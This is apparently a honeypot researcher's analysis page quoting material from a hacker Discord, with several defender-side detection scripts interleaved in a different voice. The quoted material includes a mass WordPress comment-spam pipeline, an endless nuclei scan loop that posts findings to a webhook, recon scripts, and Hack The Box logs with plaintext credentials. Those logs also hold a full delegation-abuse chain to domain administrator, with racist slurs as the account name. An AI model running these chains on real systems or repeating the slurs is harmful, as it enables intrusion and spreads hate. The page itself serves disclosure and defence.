Mon Oct 9 18:54:14 2023
(all are still regularly updated as of roughly the above date; I apologize for any organizational issues and the raw nature of this data; there’s a lot to manage and a lot coming in while I’m still trying to analyze it manually to a certain degree while monitoring services; I also have a disorganized mess of a mind)
https://bcable.net/analysis-ukr-prelim.html
https://bcable.net/analysis-ukr-graphs.html
https://bcable.net/analysis-ukr-indicators.html
https://bcable.net/analysis-ukr-ru_map_sessions.html
https://bcable.net/analysis-ukr-cn_map_sessions.html
https://bcable.net/analysis-ukr-miori_fail.html
https://bcable.net/analysis-ukr-botnet_perl.html
https://bcable.net/analysis-ukr-ddos_gh0st.html
https://bcable.net/analysis-ukr-indicators_2023.html
https://bcable.net/analysis-ukr-crew_001.html
https://bcable.net/analysis-ukr-inventory_attack.html
https://bcable.net/analysis-ukr-crew_002.html
stream = [('in', b'POST /wp-comments-post.php HTTP/1.1\x0d\x0aHost: ##bcable-redacted##\x0d\x0aUser-Agent: Mozilla/5.0 +(##redacted-user##)\x0d\x0aReferer: https://##redacted-site##/\x0d\x0aConnection: close\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0aContent-Length: 200\x0d\x0a\x0d\x0acomment=##redacted-user##+https://##redacted-site##/&author=##redacted-user##&email=##redacted-site##%40gmail.com&url=https://##redacted-site##/&submit=Post+Comment&comment_post_ID=1&comment_parent=0&wp-comment-cookies-consent=true'),
I randomly tracked the following redacted log down to a Discord invite, then “socially engineered” my way into the chat. Inside the initial “halt, who goes there” access-restriction landing channel, there was a bunch of chatting happening between hackers ranging from very skilled to very inexperienced people, totalling about 20 people. I ignored most of it; it wasn’t really relevant since it was mostly just exchanging racist nonsense. Plenty of interesting code to analyze, though, including the actual code that was used to spam this exact URL to my honeypot:
“[11/16/2022 5:26 AM] Get top1m lists (and example to search for wp-comments-post.php):”
wget -c s3.amazonaws.com/alexa-static/top-1m.csv.zip
unzip top-1m.csv.zip
cd top-1m.csv
cat top-1m.csv | sed -e "s/.*,//g" > top1m.txt
for i in $(cat top1m.txt); do echo https://$i/ >> top1mhttp.txt; done
cat top1mhttp.txt | head -n 100000 > top100k.txt
ffuf -w top100k.txt -u FUZZ -mc 200 -o workinghttp.txt
cat workinghttp.txt | jq .results[].url | tr -d '"' | sort -u | uniq >top1mworkinghttp.txt
ffuf -u FUZZ/wp-comments-post.php -w top1mworkinghttp.txt -mc 405 -o wp-comments-post.json
cat wp-comments-post.json | jq .results[].url | tr -d '"' >wp-comments-post.txt
“[11/16/2022 5:27 AM] Screen quick cheatsheet:”
screen -S session_name - create session
CTRL+A CTRL+D - detach
screen -list - list
screen -r session_name - reattach
CTRL+A K y - kill
CTRL+A ESC - scroll mode (q or esc to exit)
“Making backlinks with ffuf”
ffuf -u FUZZ -w wp-comments-post.txt -H "Content-Type: application/x-www-form-urlencoded" -H "Referer: http://yoursite.com/" -d "comment=hello+world&author=hey&email=hey%40gmail.com&url=http%3A%2F%2Fyoursite.com%2F&submit=Post+Comment&comment_post_ID=5&comment_parent=0" -H "User-Agent: Mozilla/5.0 (Firefox)"
Very interesting to see the script(s) that were used to actually hit my server. I don’t think this “crew” actually did the attack itself; they advertise this code to be used by anyone, essentially. Otherwise there wouldn’t be instructions on how to use something as simple as GNU screen. I’ve heard of similar groups that operate mostly out of Bangladesh, but this group mostly seemed to speak Portuguese.
I’ll reiterate that US intelligence, whether true or not, keeps accusing China of posing as Brazilian hackers. I seem to be finding a lot of “Brazilian hackers” or at least those who fit that profile. Later analysis suggests these people might have been Serbian or Chechen hackers, but it’s very hard to attribute.
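The capture at the top of this page and the ffuf pipeline quoted above leave two distinct traces on a WordPress host: the comment POST itself, and the GET probes that the `-mc 405` step relies on (wp-comments-post.php answers any non-POST request with 405, so a 405 on a GET means the endpoint was being fingerprinted, not used). As an added, defender-side example that is not code from the page or from the crew, the Python below parses a raw request the way a honeypot would record it and scans access-log lines for those two signals. The request bytes and log lines are constructed to resemble the redacted capture; the scanner User-Agent fragments are assumed defaults and should be checked against the tool versions you actually see.

```python
"""Flag WordPress comment-spam POSTs and the probes that precede them.

Added example for this page; not the crew's code. The sample request and
log lines are constructed to resemble the redacted honeypot capture.
"""
import re
from urllib.parse import parse_qs, urlsplit

SPAM_PATH = "/wp-comments-post.php"
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
BROWSER_TOKENS = ("Gecko", "AppleWebKit", "Chrome", "Safari", "Trident")
# Assumed default User-Agent fragments of common scanners; verify per tool version.
SCANNER_UA_MARKERS = ("fuzz faster u fool", "nuclei", "python-requests", "curl/", "go-http-client")
# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed body and headers shaped like the redacted capture on this page.
_BODY = (
    b"comment=spammer-handle+https://spam-site.example/&author=spammer-handle"
    b"&email=spam-site.example%40gmail.com&url=https://spam-site.example/"
    b"&submit=Post+Comment&comment_post_ID=1&comment_parent=0"
    b"&wp-comment-cookies-consent=true"
)
SAMPLE_REQUEST = (
    b"POST /wp-comments-post.php HTTP/1.1\r\nHost: honeypot.example\r\n"
    b"User-Agent: Mozilla/5.0 +(spammer-handle)\r\nReferer: https://spam-site.example/\r\n"
    b"Connection: close\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: %d\r\n\r\n" % len(_BODY) + _BODY
)
SAMPLE_LOG = [  # constructed access-log lines
    '203.0.113.7 - - [16/Nov/2022:05:30:01 +0000] "GET /wp-comments-post.php HTTP/1.1" 405 0 "-" "Fuzz Faster U Fool v1.5.0"',
    '203.0.113.7 - - [16/Nov/2022:05:31:12 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "https://spam-site.example/" "Mozilla/5.0 (Firefox)"',
    '198.51.100.4 - - [16/Nov/2022:05:32:40 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0"',
]


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.1 request into method, path, headers and form fields."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    form = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        form = {k: v[0] for k, v in parse_qs(body.decode("latin-1"), keep_blank_values=True).items()}
    return {"method": method, "path": path, "headers": headers, "form": form}


def comment_spam_indicators(req: dict) -> list:
    """Short tags explaining why a wp-comments-post.php POST looks like backlink spam."""
    if req["method"] != "POST" or urlsplit(req["path"]).path != SPAM_PATH:
        return []
    form, headers, tags = req["form"], req["headers"], []
    links = URL_RE.findall(form.get("comment", ""))
    url_host = urlsplit(form.get("url", "")).hostname
    ref_host = urlsplit(headers.get("referer", "")).hostname
    if links:
        tags.append("link-in-comment")
    if url_host and url_host == ref_host:
        tags.append("referer-matches-url")  # Referer points at the site being promoted
    if url_host and any(urlsplit(u).hostname == url_host for u in links):
        tags.append("comment-links-to-url-host")
    if form.get("comment_post_ID") == "1":
        tags.append("post-id-1")  # blind guess at WordPress's default first post
    if not any(t in headers.get("user-agent", "") for t in BROWSER_TOKENS):
        tags.append("non-browser-ua")
    return tags


def probe_indicators(log_lines) -> list:
    """(ip, path, tags) for log lines that look like WordPress probing or scanner traffic."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = []
        # A 405 on a GET to the comment endpoint is an existence check, not a comment.
        if m["method"] == "GET" and urlsplit(m["path"]).path == SPAM_PATH and m["status"] == "405":
            tags.append("wp-comments-probe")
        if any(marker in m["ua"].lower() for marker in SCANNER_UA_MARKERS):
            tags.append("scanner-ua")
        if tags:
            hits.append((m["ip"], m["path"], tags))
    return hits


if __name__ == "__main__":
    print(comment_spam_indicators(parse_request(SAMPLE_REQUEST)))
    for hit in probe_indicators(SAMPLE_LOG):
        print(hit)
```

The tags are deliberately cheap signals: any one of them on its own is weak, but a POST carrying three or more, preceded minutes earlier by a 405-answered GET from the same address, is the exact pattern the quoted pipeline produces and is a reasonable trigger for rate-limiting or blocking the source.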
Here is another project, which seems to send a generic JSON webhook to mass targets. It takes things off HackerOne datasets and uses nuclei to attempt to exploit them, so things should be acceptable targets.
/usr/bin/getallscope
#!/usr/bin/python3
import json
import requests
import random
url = "https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/hackerone_data.json"
r = requests.get(url=url)
fullz = []
datas = json.loads(r.text)
for data in datas:
    if not "targets" in data: continue
    for target in data["targets"]["in_scope"]:
        if not target["asset_identifier"].startswith("*."): continue
        if not target["eligible_for_bounty"] == True: continue
        if not target["eligible_for_submission"] == True: continue
        fullz.append(target["asset_identifier"].replace("*.", ""))
random.shuffle(fullz)
print("\n".join(fullz))
/usr/bin/getrandscope
#!/bin/bash
getallscope | shuf | head -n 10 | assetfinder -subs-only > tmpfile
/usr/bin/autopwn
#!/bin/bash
rm probed;
rm foundvuln.txt;
rm tmpfile;
getrandscope;
cat tmpfile | shuf | httprobe -c 100 | tee -a probed;
nuclei -as -silent -s medium,high,critical -nc -l probed | xargs -L 1 sendwebhook | tee -a foundvuln.txt;
/usr/bin/sendwebhook (change webhook url to yours)
#!/bin/bash
argstr=$@;
argstr=$(echo $argstr | tr -d '"');
echo $argstr;
curl WEBHOOK_URL_HERE -H "Content-Type: application/json" --data "{\"name\":\"hello\", \"content\":\"$argstr\"}";
sleep 2;
/usr/bin/pwnforever
#!/bin/bash
while true; do
autopwn;
done
“and finally run this command then exit out of your vps and wait for bugs to pop in your discord channel”
nohup pwnforever &
“remember to chmod +x every script”
“and install assetfinder, nuclei, httprobe”
“(they’re in kali’s repositories just apt install)”
“takes urls from stdin and prints only the ones with unique parameter names”
#!/usr/bin/python3
import sys
urlparamlist = []
def getpath(url):
    if not "://" in url: return ""
    urll = url.split("://")[1]
    urll = "/".join(urll.split("/")[1:])
    if "?" in urll: urll = urll.split("?")[0]
    return urll
def alreadyparam(url):
    global urlparamlist
    paramsfull = ""
    urlparams = url.split("?")
    if len(urlparams) > 1:
        urlparams = urlparams[1]
    else:
        urlparams = ""
    paramsfull += getpath(url)
    for urlparam in urlparams.split("&"):
        if not "=" in urlparam: continue
        else: urlparam = urlparam.split("=")[0]
        paramsfull += "{}".format(urlparam)
    if not paramsfull in urlparamlist:
        urlparamlist.append(paramsfull)
        return 0
    else:
        return 1
for url in sys.stdin:
    url = url.strip()
    if not alreadyparam(url):
        print(url)
“example:”
cat all_urls.txt | python uniqparam.py > unique_param.txt
function grabipranges() {
    let full = "";
    var links = document.getElementsByTagName("a");
    for(let i = 0; i < links.length; i++) {
        if(!links[i].href) continue;
        if(links[i].href.indexOf("/prefix/") == -1) continue;
        if(links[i].href.indexOf("::") !== -1) continue; // skip IPv6 prefixes
        full += links[i].href.split("prefix/")[1] + " ";
    }
    console.log(full);
}
grabipranges();
“little script to grab all ip ranges from bgp.tools”
#!/bin/bash
if [[ $# < 1 ]]; then
echo "$0 <domain>";
exit;
fi
echo "Checking dependencies...";
if ! which assetfinder &>/dev/null; then
sudo apt install assetfinder;
fi
if ! which getallurls &>/dev/null; then
sudo apt install getallurls;
fi
if ! which nmap &>/dev/null; then
sudo apt install nmap;
fi
if ! which httprobe &>/dev/null; then
sudo apt install nmap;
fi
if ! which dirsearch &>/dev/null; then
sudo apt install dirsearch;
fi
echo "Cleaning up previous scan files...";
rm assetsfound.txt &>/dev/null;
rm all_urls.txt &>/dev/null;
rm nmap-scan.txt &>/dev/null;
rm assetsworking.txt &>/dev/null;
rm dirsearched.txt &>/dev/null;
rm customwordlist.txt &>/dev/null;
echo "Starting..";
echo "Running assetfinder...";
assetfinder -subs-only $1 | tee -a assetsfound.txt;
echo "Cleaning up asset list...";
cat assetsfound.txt | sort -u | uniq > assetsfoundt.txt;
mv assetsfoundt.txt assetsfound.txt;
echo "Probing for working http servers...";
cat assetsfound.txt | httprobe | tee -a assetsworking.txt;
echo "Cleaning working assets list...";
cat assetsworking.txt | sort -u | uniq > assetsworkingt.txt;
mv assetsworkingt.txt assetsworking.txt;
echo "Creating custom wordlist...";
for i in $(cat assetsworking.txt); do curl $i --output - | sed -e "s/\s/\n/g" | tr "[:cntrl:][:punct:]" "\n" | tr -s "[:cntrl:]" "\n" >>customwordlist.txt; done;
echo "Cleaning custom wordlist...";
cat customwordlist.txt | sort -u | uniq > customwordlistt.txt;
mv customwordlistt.txt customwordlist.txt;
echo "Running getallurls...";
for i in $(cat assetsworking.txt); do getallurls $i | tee -a all_urls.txt; done;
echo "Running nmap...";
nmap -sT -Pn -T5 -vv -n -iL assetsfound.txt -oN nmap-scan.txt;
echo "Running dirsearch...";
cp assetsworking.txt /tmp/assetsworking.txt;
dirsearch -l /tmp/assetsworking.txt -o /tmp/dirsearched.txt;
rm /tmp/assetsworking.txt;
mv /tmp/dirsearched.txt dirsearched.txt;
echo "Running dirsearch with the custom wordlist...";
cp assetsworking.txt /tmp/assetsworking.txt;
cp customwordlist.txt /tmp/customwordlist.txt;
dirsearch -l /tmp/assetsworking.txt -o /tmp/dirsearched.txt -w /tmp/customwordlist.txt;
rm /tmp/assetsworking.txt;
rm /tmp/customwordlist.txt;
mv /tmp/dirsearched.txt dirsearched_customlist.txt;
echo "All done!";
#!/usr/bin/python3
import sys
urlparamlist = []
def getpath(url):
    if not "://" in url: return ""
    urll = url.split("://")[1]
    urll = "/".join(urll.split("/")[1:])
    if "?" in urll: urll = urll.split("?")[0]
    return urll
def getbase(url):
    schema = url.split("://")[0]
    url = url.split("://")[1]
    if "/" in url: url = url.split("/")[0]
    fullurl = "{}://{}/".format(schema, url)
    return fullurl
def alreadyparam(url):
    global urlparamlist
    paramsfull = ""
    urlparams = url.split("?")
    if len(urlparams) > 1:
        urlparams = urlparams[1]
    else:
        urlparams = ""
    paramsfull += getpath(url)+"?"
    for urlparam in urlparams.split("&"):
        if not "=" in urlparam: continue
        else: urlparam = urlparam.split("=")[0]
        paramsfull += "{}={}&".format(urlparam, sys.argv[1])
    paramsfull = "&".join(paramsfull.split("&")[:-1])
    if not paramsfull in urlparamlist:
        urlparamlist.append(paramsfull)
        print(getbase(url)+paramsfull)
        return 0
    else:
        return 1
for url in sys.stdin:
    url = url.strip()
    alreadyparam(url)
“generate custom wordlist from cewl output”
cat cewld.txt | python3 wordg.py > generated.txt
import sys
words = []
for line in sys.stdin:
    words.append(line.strip())
def mk(lower=False):
    for word in words:
        for word2 in words:
            if word == word2: continue
            if lower == True:
                word = word.lower()
                word2 = word2.lower()
            print("{}{}".format(word, word2))
            print("{}-{}".format(word, word2))
            print("{}.{}".format(word, word2))
            print("{}_{}".format(word, word2))
words = list(set(words))
mk()
mk(lower=True)
These I believe are logs of their CTF challenge successes.
Nmap scan report for 10.10.11.174
Host is up, received user-set (0.093s latency).
Scanned at 2022-10-31 15:18:34 EDT for 61s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-10-31 19:18:49Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 46499/tcp): CLEAN (Timeout)
| Check 2 (port 19493/tcp): CLEAN (Timeout)
| Check 3 (port 45724/udp): CLEAN (Timeout)
| Check 4 (port 55678/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-10-31T19:18:57
|_ start_date: N/A
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| guest@support.htb
|_ administrator@support.htb
SMB dc.support.htb 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB dc.support.htb 445 DC [+] support.htb\guest:
SMB dc.support.htb 445 DC [+] Enumerated shares
SMB dc.support.htb 445 DC Share Permissions Remark
SMB dc.support.htb 445 DC ----- ----------- ------
SMB dc.support.htb 445 DC ADMIN$ Remote Admin
SMB dc.support.htb 445 DC C$ Default share
SMB dc.support.htb 445 DC IPC$ READ Remote IPC
SMB dc.support.htb 445 DC NETLOGON Logon server share
SMB dc.support.htb 445 DC support-tools READ support staff tools
SMB dc.support.htb 445 DC SYSVOL Logon server share
CREDS:
ldap
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = -1
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Version]
signature="$CHICAGO$"
Revision=1
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,2
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
[Unicode]
Unicode=yes
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireSignOrSeal=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\EnableSecuritySignature=4,1
[Privilege Rights]
SeAssignPrimaryTokenPrivilege = *S-1-5-20,*S-1-5-19
SeAuditPrivilege = *S-1-5-20,*S-1-5-19
SeBackupPrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeBatchLogonRight = *S-1-5-32-559,*S-1-5-32-551,*S-1-5-32-544
SeChangeNotifyPrivilege = *S-1-5-32-554,*S-1-5-11,*S-1-5-32-544,*S-1-5-20,*S-1-5-19,*S-1-1-0
SeCreatePagefilePrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeIncreaseBasePriorityPrivilege = *S-1-5-90-0,*S-1-5-32-544
SeIncreaseQuotaPrivilege = *S-1-5-32-544,*S-1-5-20,*S-1-5-19
SeInteractiveLogonRight = *S-1-5-9,*S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-548,*S-1-5-32-551,*S-1-5-32-544
SeLoadDriverPrivilege = *S-1-5-32-550,*S-1-5-32-544
SeMachineAccountPrivilege = *S-1-5-11
SeNetworkLogonRight = *S-1-5-32-554,*S-1-5-9,*S-1-5-11,*S-1-5-32-544,*S-1-1-0
SeProfileSingleProcessPrivilege = *S-1-5-32-544
SeRemoteShutdownPrivilege = *S-1-5-32-549,*S-1-5-32-544
SeRestorePrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSecurityPrivilege = *S-1-5-32-544
SeShutdownPrivilege = *S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSystemEnvironmentPrivilege = *S-1-5-32-544
SeSystemProfilePrivilege = *S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420,*S-1-5-32-544
SeSystemTimePrivilege = *S-1-5-32-549,*S-1-5-32-544,*S-1-5-19
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeUndockPrivilege = *S-1-5-32-544
SeEnableDelegationPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
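The two policy exports above are the kind of artifact a defender can audit mechanically rather than by eye. As an added example (my code, not from the page or the crew), the Python below parses a secedit-style INF, resolves the well-known SIDs that appear in it, reports sensitive user rights held by broad principals, and checks the signing-related registry values against their hardened settings. Two things it surfaces from the data above: SeMachineAccountPrivilege is held by Authenticated Users (S-1-5-11), which is what lets an ordinary domain user create the machine account used further down in the delegation chain, and the second export sets LDAPServerIntegrity to 1, meaning LDAP signing is not required. The INF text is constructed from the values shown above; the SID table covers only the well-known SIDs present there.

```python
"""Audit a secedit /export INF for broadly granted rights and weak signing settings.

Added example; not the crew's tooling. SAMPLE_INF is constructed from the
values shown on this page.
"""
from typing import Dict, List, Tuple

WELL_KNOWN_SIDS = {  # well-known SIDs that appear in the exports above
    "S-1-1-0": "Everyone",
    "S-1-5-9": "Enterprise Domain Controllers",
    "S-1-5-11": "Authenticated Users",
    "S-1-5-19": "Local Service",
    "S-1-5-20": "Network Service",
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-554": "Pre-Windows 2000 Compatible Access",
}
# Principals that effectively mean "any account": a sensitive right granted to
# one of these is a finding. (Everyone, Authenticated Users, Anonymous, Users, Guests)
BROAD_PRINCIPALS = {"S-1-1-0", "S-1-5-11", "S-1-5-7", "S-1-5-32-545", "S-1-5-32-546"}
SENSITIVE_RIGHTS = {
    "SeMachineAccountPrivilege": "can create computer accounts (precondition for delegation abuse by an ordinary user)",
    "SeEnableDelegationPrivilege": "can mark accounts as trusted for delegation",
    "SeDebugPrivilege": "can attach to any process, including LSASS",
    "SeBackupPrivilege": "can read any file regardless of ACL",
    "SeRestorePrivilege": "can write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "can take ownership of any securable object",
}
# Registry values in the export use "4,N": REG_DWORD (type 4) followed by the value.
HARDENING = {  # key suffix -> (hardened value, meaning)
    "NTDS\\Parameters\\LDAPServerIntegrity": ("2", "LDAP signing required (1 = not required)"),
    "Netlogon\\Parameters\\RequireSignOrSeal": ("1", "secure channel must be signed or sealed"),
    "LanManServer\\Parameters\\RequireSecuritySignature": ("1", "SMB server signing required"),
    "Lsa\\NoLMHash": ("1", "LM hashes are not stored"),
}

SAMPLE_INF = r"""
[Unicode]
Unicode=yes
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireSignOrSeal=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature=4,1
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
[Privilege Rights]
SeChangeNotifyPrivilege = *S-1-5-32-554,*S-1-5-11,*S-1-5-32-544,*S-1-5-20,*S-1-5-19,*S-1-1-0
SeDebugPrivilege = *S-1-5-32-544
SeMachineAccountPrivilege = *S-1-5-11
SeNetworkLogonRight = *S-1-5-32-554,*S-1-5-9,*S-1-5-11,*S-1-5-32-544,*S-1-1-0
SeEnableDelegationPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_inf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the INI-like INF into {section: {key: value}}; later duplicates win."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip()] = value.strip()
    return sections


def sid_name(sid: str) -> str:
    return WELL_KNOWN_SIDS.get(sid, sid)


def privilege_findings(sections) -> List[Tuple[str, List[str], str]]:
    """(right, broad holders by name, why it matters) for sensitive rights held broadly."""
    findings = []
    for right, holders in sections.get("Privilege Rights", {}).items():
        sids = [h.strip().lstrip("*") for h in holders.split(",") if h.strip()]
        broad = [sid_name(s) for s in sids if s in BROAD_PRINCIPALS]
        if right in SENSITIVE_RIGHTS and broad:
            findings.append((right, broad, SENSITIVE_RIGHTS[right]))
    return findings


def registry_findings(sections) -> List[Tuple[str, str, bool, str]]:
    """(setting, observed value, hardened?, meaning) for each tracked registry value."""
    results = []
    for key, typed_value in sections.get("Registry Values", {}).items():
        _type, _, value = typed_value.partition(",")
        for suffix, (hardened, meaning) in HARDENING.items():
            if key.endswith(suffix):
                results.append((suffix, value, value == hardened, meaning))
    return results


if __name__ == "__main__":
    parsed = parse_inf(SAMPLE_INF)
    for right, who, why in privilege_findings(parsed):
        print(f"[!] {right} held by {', '.join(who)}: {why}")
    for setting, value, ok, meaning in registry_findings(parsed):
        print(f"[{'ok' if ok else '!!'}] {setting} = {value} ({meaning})")
```

Authenticated Users holding SeMachineAccountPrivilege is the Windows default on domain controllers, so the finding is expected on an unhardened domain; the usual remediation is to set ms-DS-MachineAccountQuota to 0 or to restrict the right to a dedicated join account.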
support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoria
CREDS
support
Ironside47pleasure40Watchful
LOGIN PS
evil-winrm -i dc.support.htb -u support
REMOTE
New-MachineAccount -MachineAccount "NIGGER" -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Set-ADComputer "DC" -PrincipalsAllowedToDelegateToAccount "NIGGER$"
.\Rubeus.exe hash /password:123456 /user:NIGGER$ /domain:support.htb
LOCAL
impacket-getST support.htb/NIGGER$ -spn http/dc.support.htb -aesKey 52BB4083984059E72EEFD69D56412220 -impersonate administrator -dc-ip dc.support.htb
export KRB5CCNAME=administrator.ccache
impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
ROOTT FUCCKING FINNAALLYY NIGGGGERRRR
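The chain logged above (a machine account created by a low-privilege user, delegation configured on the domain controller object, then a service ticket obtained as another user) leaves two distinct entries in a domain controller's Security log, provided account-management auditing is on and directory-service-change auditing with a matching SACL is in place: event 4741 (a computer account was created) and event 5136 (a directory service object was modified) carrying the attribute msDS-AllowedToActOnBehalfOfOtherIdentity. As an added example, not the crew's code, the Python below correlates those two events by the acting account inside a time window. The events are constructed dictionaries using the support.htb naming from the log above with a placeholder machine name; the allow-list of accounts expected to join computers is an assumption you would replace with your own.

```python
"""Correlate computer-account creation with RBCD attribute writes in DC security events.

Added example; not the crew's tooling. EVENTS below are constructed from the
chain shown on this page (support.htb), with a placeholder machine name.
"""
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

RBCD_ATTRIBUTE = "msds-allowedtoactonbehalfofotheridentity"
# Assumption: the only accounts expected to create computer objects in this domain.
ALLOWED_JOINERS = {"svc-joiner"}

T0 = datetime(2022, 10, 31, 19, 30, 0)
EVENTS: List[Dict] = [  # constructed, shaped like parsed Security-log records
    {"id": 4741, "time": T0, "SubjectUserName": "support",
     "TargetUserName": "FAKEPC$"},
    {"id": 5136, "time": T0 + timedelta(minutes=2), "SubjectUserName": "support",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": "%%14674"},  # %%14674 = value added
    {"id": 4741, "time": T0 + timedelta(hours=1), "SubjectUserName": "svc-joiner",
     "TargetUserName": "WS042$"},
    {"id": 5136, "time": T0 + timedelta(hours=2), "SubjectUserName": "support",
     "ObjectDN": "CN=Mail,OU=Servers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
]


def is_domain_controller(dn: str) -> bool:
    return "ou=domain controllers," in dn.lower()


def rbcd_findings(events, window_hours: float = 24.0) -> List[Tuple[str, str, str]]:
    """Return (kind, actor, detail) tuples in event order.

    kinds: unexpected-computer-create, rbcd-attribute-set, rbcd-chain.
    """
    window = timedelta(hours=window_hours)
    findings: List[Tuple[str, str, str]] = []
    recent_creates: Dict[str, List[Tuple[datetime, str]]] = {}  # actor -> [(time, computer)]
    for ev in sorted(events, key=lambda e: e["time"]):
        actor = ev["SubjectUserName"]
        if ev["id"] == 4741:
            computer = ev["TargetUserName"]
            recent_creates.setdefault(actor, []).append((ev["time"], computer))
            # DCs create objects as MACHINE$; accounts on the allow-list are expected to.
            if actor not in ALLOWED_JOINERS and not actor.endswith("$"):
                findings.append(("unexpected-computer-create", actor, computer))
        elif ev["id"] == 5136 and ev.get("AttributeLDAPDisplayName", "").lower() == RBCD_ATTRIBUTE:
            target = ev["ObjectDN"]
            # Legitimate RBCD setups are rare and done by admins; a write on a DC
            # object is high severity regardless of who did it.
            suffix = " [DC]" if is_domain_controller(target) else ""
            findings.append(("rbcd-attribute-set", actor, target + suffix))
            for created_at, computer in recent_creates.get(actor, []):
                if timedelta(0) <= ev["time"] - created_at <= window:
                    findings.append(("rbcd-chain", actor, f"{computer} -> {target}"))
    return findings


if __name__ == "__main__":
    for kind, actor, detail in rbcd_findings(EVENTS):
        print(f"{kind:26} {actor:12} {detail}")
```

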